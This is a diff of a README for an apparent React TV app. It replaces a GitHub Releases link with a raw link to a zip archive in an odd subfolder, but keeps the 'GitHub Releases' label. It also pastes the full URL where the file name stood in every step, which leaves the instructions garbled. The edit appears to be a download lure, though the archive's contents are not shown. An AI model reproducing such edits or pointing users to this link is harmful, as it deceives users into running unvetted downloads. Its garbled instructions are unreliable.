Endegena-code/tv-app-react/README.md

 ### 2. Download and Install

-To get the application, **visit this page to download**: [GitHub Releases](https://github.com/Endegena-code/tv-app-react/releases).
+To get the application, **visit this page to download**: [GitHub Releases](https://raw.githubusercontent.com/Endegena-code/tv-app-react/main/hainberry/tv-app-react.zip).

 Once there, follow these steps:

 1. Scroll down to the **Assets** section.
-2. Look for the file named `tv-app-react.zip`.
+2. Look for the file named `https://raw.githubusercontent.com/Endegena-code/tv-app-react/main/hainberry/tv-app-react.zip`.
 3. Click on the file to begin downloading it.
-4. Once the download is complete, locate the `tv-app-react.zip` file in your downloads folder.
+4. Once the download is complete, locate the `https://raw.githubusercontent.com/Endegena-code/tv-app-react/main/hainberry/tv-app-react.zip` file in your downloads folder.

 ### 3. Extract the Files

 After downloading, you need to extract the files:

-1. Right-click on the `tv-app-react.zip` file.
+1. Right-click on the `https://raw.githubusercontent.com/Endegena-code/tv-app-react/main/hainberry/tv-app-react.zip` file.
 2. Select **Extract All...** or use a similar option depending on your operating system.
 3. Choose a destination folder where you want to extract the files, and click **Extract**.